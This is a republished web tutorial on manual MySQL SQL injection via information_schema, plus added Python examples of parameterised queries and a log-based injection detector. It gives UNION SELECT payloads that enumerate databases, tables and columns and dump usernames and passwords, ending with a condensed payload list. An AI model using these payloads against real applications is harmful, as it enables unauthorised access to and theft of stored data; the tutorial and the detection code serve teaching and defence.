2025-01-18 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
Information_schema
SQL Foundation
1.1 What is SQL?
SQL (Structured Query Language) is the standard language of relational databases. SQL is a general-purpose and powerful relational database language, but its function is not limited to queries.
1.2 MySQL
MySQL is a relational database management system developed by the Swedish company MySQL AB and now owned by Oracle. As a relational database management system, MySQL stores data in separate tables instead of putting all data in one large warehouse, which increases speed and flexibility. (From Baidu Encyclopedia)
SQL injection Foundation
2.1 What is SQL injection?
SQL injection means tricking the server into executing malicious SQL commands by inserting SQL commands into the fields submitted by a Web form, into the domain name, or into the query string of a page request. Put simply, SQL injection is a technique that inserts into or modifies the back-end SQL statement by manipulating input (a form, a GET request, a POST request, etc.) so that the injected code is executed.
2.2 Causes of SQL injection
The main cause of SQL injection vulnerabilities is that many web programmers do not strictly validate and filter user input when writing code, so the application ends up with this vulnerability.
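To make the cause concrete, here is an added example (not from the article) in Python. It uses an in-memory sqlite3 database as a stand-in for MySQL (an assumption; the WHERE-clause mechanics the article relies on behave the same way). It places the users query built by string concatenation, as the article's target page does, next to a hardened version that validates uid and binds it as a parameter. The table contents and the function names lookup_unsafe and lookup_safe are constructed for this example.

```python
import sqlite3


def make_db():
    # Constructed sample data mirroring the article's learn.users table.
    # sqlite3 stands in for MySQL here (assumption); the WHERE clause
    # mechanics that the article relies on behave the same way.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (uid INTEGER, username TEXT, phone TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [(1, "alice", "555-0100", "s3cret"), (2, "bob", "555-0101", "hunter2")],
    )
    return conn


def lookup_unsafe(conn, uid_input):
    # Vulnerable: the request value is pasted straight into the statement text,
    # so whatever the client sends becomes part of the SQL that runs.
    sql = "SELECT uid,username,phone FROM users WHERE uid=" + uid_input
    return conn.execute(sql).fetchall()


def lookup_safe(conn, uid_input):
    # Hardened: validate the input type first, then bind it as a parameter.
    # The driver sends the value separately from the statement text, so it
    # can never be parsed as SQL.
    try:
        uid = int(uid_input)
    except (TypeError, ValueError):
        return []
    return conn.execute(
        "SELECT uid,username,phone FROM users WHERE uid=?", (uid,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1 and 1=2", "-1 UNION SELECT 1,2,3"):
        try:
            unsafe = lookup_unsafe(db, value)
        except sqlite3.Error as exc:
            unsafe = f"error: {exc}"
        print(f"{value!r:28} unsafe={unsafe}  safe={lookup_safe(db, value)}")
```

Run as a script, the unsafe lookup returns the injected row for the UNION input and nothing for the false boolean condition, while the safe lookup rejects both inputs before any SQL runs; the same pattern applies to any integer key taken from a request.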
2.3 Methods of MySQL injection
There are two common methods of MySQL injection:
(1) Manual injection.
(2) Injection with tools.
2.4 Principle of MySQL manual injection
Manual injection of MySQL mainly relies on MySQL's information_schema database, which stores information about all the databases on the MySQL server: the names of the databases, the tables in each database, the data types and access rights of the table columns, and so on. Put simply, which databases exist on this MySQL server, which tables are in each database, what the field types of each table are, what permissions are needed to access each database, and similar information are all stored in the information_schema database.
Introduction to the basic environment of MySQL manual injection
Database involved: learn; table involved: users.
Table users
3.2 Determine the injection point
Append and 1=1 (normal display) and and 1=2 (abnormal display), but the conditions are not limited to these; 3>1 (normal display) and 3>5 (abnormal display) work as well.
3.2.1 Determine whether uid is an injection point
The query statement itself is: SELECT uid,username FROM users WHERE uid=1
3.2.2 Principle of the judgment
SELECT uid,username FROM users WHERE uid=1 and 1=1
Normal display
SELECT uid,username FROM users WHERE uid=1 and 1=2
Abnormal display
3.3 Fields
3.3.1 ORDER BY sorting
ORDER BY is mainly used for sorting. The basic usage is: ORDER BY column_name [ASC | DESC]
The column name can be a column name from the SELECT list, or a number, which means the first column, the second column, and so on. The number of queried fields can therefore be determined by sorting on column numbers with ORDER BY.
3.3.2 Check the number of fields in the current query
The query statement itself: SELECT uid,username,phone FROM users WHERE uid=1
Query result
Check the current number of fields (columns) with ORDER BY:
SELECT uid,username,phone FROM users WHERE uid=1 ORDER BY 3
Normal display
SELECT uid,username,phone FROM users WHERE uid=1 ORDER BY 4
Abnormal display
Because the current page's query selects only three fields, sorting by the fourth column raises an error. So the number of columns can be found by halving the range (binary search): the largest value that displays normally, with the next value abnormal, is the number of columns in the current query.
3.4 Query the display positions of the fields on the page
To find where the union query data is displayed, make the preceding condition false and append UNION SELECT (if the preceding condition is true, the page shows the original row and the desired information is not visible). Alternatively, leave the preceding condition unchanged and append UNION SELECT ... LIMIT m,1. (If the page shows the numbers from the UNION SELECT query, you can see where each field is displayed on the page; this does not work if the query returns too much information, so the first approach is recommended.)
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,3
Displays the location of the query field on the page
3.5 Query basic information
Querying basic information means using the database's built-in functions and system variables to obtain it:
1. version() -- MySQL version
2. user() -- user name
3. database() -- database name
4. @@datadir -- database path
5. @@version_compile_os -- operating system version
By putting the corresponding function into one of the numbered display positions found on the page, we can read the corresponding information from the page.
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT version(),user(),database()
Query basic information
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT @@datadir,@@version_compile_os,database()
Query basic information
In addition, we can use the string concatenation function to query several pieces of information at once:
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,CONCAT(version(),0x3B,user(),0x3B,database(),0x3B,@@datadir,0x3B,@@version_compile_os)
0x3B is the hexadecimal of the delimiter ;
Use the concatenation function to query several pieces of information
Example of the concatenation function
Advanced database lookup:
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,SCHEMA_NAME FROM information_schema.SCHEMATA LIMIT 9,1
LIMIT 9,1 starts at offset 9 and returns one record, so it can be used to list the databases one by one.
Advanced database lookup
Run only: SELECT 1,2,SCHEMA_NAME FROM information_schema.SCHEMATA LIMIT 8,3
LIMIT m,n example
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,GROUP_CONCAT(SCHEMA_NAME) FROM information_schema.SCHEMATA
Query which databases exist in the current connection
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,GROUP_CONCAT(DISTINCT TABLE_SCHEMA) FROM information_schema.COLUMNS
Query which databases exist in the current connection
3.6 Look up the table names
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,TABLE_NAME FROM (SELECT * FROM information_schema.TABLES WHERE TABLE_SCHEMA=learn) a
Error
Here the database name has to be converted to hexadecimal: the bare word learn is parsed as a column name, which is why the statement errors, whereas the hex literal 0x6C6561726E is a string value and needs no quotes.
Convert to hexadecimal
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,TABLE_NAME FROM (SELECT * FROM information_schema.TABLES WHERE TABLE_SCHEMA=0x6C6561726E) a
Query the table names of the specified database
Run only SELECT * FROM information_schema.tables WHERE TABLE_SCHEMA=0x6C6561726E
Principle
Advanced table lookup:
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA=0x6C6561726E
Advanced look-up table
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,GROUP_CONCAT(TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA=0x6C6561726E
Advanced table lookup
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,GROUP_CONCAT(DISTINCT TABLE_NAME) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA=0x6C6561726E
Advanced table lookup
3.7 Look up the fields
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,COLUMN_NAME FROM (SELECT * FROM information_schema.COLUMNS WHERE TABLE_SCHEMA=0x6C6561726E) a
Look up the field
Here you can query in a loop with LIMIT m,n, or use the GROUP_CONCAT function to query everything at once.
One-time query
Run only SELECT * FROM information_schema.COLUMNS WHERE TABLE_SCHEMA=0x6C6561726E AND TABLE_NAME=0x7573657273
Principle
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,COLUMN_NAME FROM (SELECT * FROM information_schema.COLUMNS WHERE TABLE_SCHEMA=0x6C6561726E) a
Principle
Here you can use LIMIT m,n to query the records one by one (LIMIT m,1).
Advanced field lookup:
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA=0x6C6561726E
Advanced lookup field
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,GROUP_CONCAT(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_NAME=0x7573657273
Advanced field lookup
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,GROUP_CONCAT(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA=0x6C6561726E
Look up the field
3.8 Check the field contents
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,username FROM users
Check the contents of the field
Here you can query the rows one by one with LIMIT m,1, or use the GROUP_CONCAT function to query them all at once.
Use the concatenation function
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,GROUP_CONCAT(uid,0x3B,username,0x3B,password) FROM users
Concatenation function one-time query
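Seen from the defender's side, the enumeration chain in sections 3.2 to 3.8 leaves a recognisable trail in the web server's access log: boolean conditions appended to a parameter, ORDER BY column-count probes, UNION SELECT against information_schema, GROUP_CONCAT, and hex-encoded names such as 0x6C6561726E for learn (section 3.6). The following Python example is added here and is not part of the article. The log lines are constructed in Common Log Format, and the signature names, the analyze() and suspects() functions and the two-distinct-signature threshold are choices made for this example rather than any product's rule set.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines in Common Log Format (not from the article).
# 10.0.0.9 walks through the article's steps: boolean probe, ORDER BY probe,
# then a UNION SELECT against information_schema with a hex-encoded name.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Jan/2025:10:00:01 +0000] "GET /user.php?uid=1 HTTP/1.1" 200 512
10.0.0.9 - - [18/Jan/2025:10:00:02 +0000] "GET /user.php?uid=1%20and%201%3D2 HTTP/1.1" 200 88
10.0.0.9 - - [18/Jan/2025:10:00:03 +0000] "GET /user.php?uid=1%20ORDER%20BY%204 HTTP/1.1" 500 12
10.0.0.9 - - [18/Jan/2025:10:00:04 +0000] "GET /user.php?uid=-1%20UNION%20SELECT%201,2,GROUP_CONCAT(TABLE_NAME)%20FROM%20information_schema.TABLES%20WHERE%20TABLE_SCHEMA=0x6C6561726E HTTP/1.1" 200 640
10.0.0.7 - - [18/Jan/2025:10:00:05 +0000] "GET /search.php?q=order%20status HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r"(?P<status>\d{3}) (?P<size>\d+)"
)

# Signature names are this example's own labels, not a product's rule set.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b.*?\bselect\b", re.I | re.S),
    "information_schema": re.compile(r"\binformation_schema\s*\.", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\b", re.I),
    "boolean_probe": re.compile(r"\b(and|or)\s+\d+\s*(=\s*\d+)?\s*(#|--|$)", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
}

# A MySQL hex literal such as 0x6C6561726E; only whole byte pairs count.
HEX_RE = re.compile(r"0x((?:[0-9a-fA-F]{2})+)\b")


def decode_hex_literals(text):
    """Replace hex string literals with the quoted text they encode,
    so 0x6C6561726E reads as 'learn' in the analyst's view."""
    def repl(match):
        decoded = bytes.fromhex(match.group(1)).decode("ascii", errors="replace")
        if decoded.isprintable() and "\ufffd" not in decoded:
            return repr(decoded)
        return match.group(0)  # not printable text: leave the literal alone
    return HEX_RE.sub(repl, text)


def analyze(log_text):
    """Return one finding per request whose decoded query string matches
    at least one signature."""
    findings = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # skip lines that are not in the expected format
        query = urlsplit(match.group("target")).query
        decoded = decode_hex_literals(unquote_plus(query))
        tags = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
        if tags:
            findings.append({
                "ip": match.group("ip"),
                "status": match.group("status"),
                "decoded": decoded,
                "tags": tags,
            })
    return findings


def suspects(findings, min_distinct_tags=2):
    """Group findings by client and keep clients that tripped at least
    min_distinct_tags different signatures: one match can be a false
    positive, a chain of different probes from one source rarely is."""
    by_ip = {}
    for finding in findings:
        by_ip.setdefault(finding["ip"], set()).update(finding["tags"])
    return {ip: sorted(tags) for ip, tags in by_ip.items() if len(tags) >= min_distinct_tags}


if __name__ == "__main__":
    found = analyze(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["status"], f["tags"], f["decoded"])
    print("suspects:", suspects(found))
```

Decoding the hex literals before matching matters twice over: it lets an analyst read which schema and table names were requested, and it keeps a name-based signature from being evaded by the same encoding the article uses to avoid quotes. The per-client threshold is what turns isolated matches into an incident: the benign search for "order status" never matches, while the client that chains a boolean probe, an ORDER BY probe and an information_schema query is flagged.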
Tool injection
When using tools for injection, it is best to make a manual judgment first; if the point is injectable or looks suspicious, it can then be handed to a tool.
4.1 SQL injection tools
Tools include, but are not limited to: sqlmap, BSQL, the mole, pangolin, enema sqli, SQLninja, sqlsus, safe3 sql injector, sql poizon, Ah D, Havij, HDSI3.0, NBSI and so on.
4.2 Advantages and disadvantages of tool injection
Tool injection saves a lot of time, but a tool alone cannot always exploit the vulnerability, because tools have their own limitations and are not as flexible as manual work. Put simply, if the application does some filtering, manual injection has to be applied flexibly; and if the program filters the query statement only when inserting it into the database, that behaviour can be bypassed simply, for example with union select 1, 2, 3.
Brief introduction to information_schema
The figures above show the relevant tables of information_schema, to deepen understanding of the information used above. For more details, check the relevant tables in the information_schema database!
Information_schema
Information_schema.columns
Information_schema.schemata
Information_schema.processlist
Information_schema.tables
Information_schema.partitions
The complexity above is pure pretence; here is the simple version of MySQL manual injection:
UNION SELECT 1,2,3,group_concat(schema_name),5,6,7 from information_schema.schemata (list all databases)
UNION SELECT 1,2,TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA='database name' (look up the tables)
UNION SELECT 1,2,COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='learn' (look up the fields)
UNION SELECT group_concat(field,field) FROM table_name (read the field contents)
© 2024 shulou.com SLNews company. All rights reserved.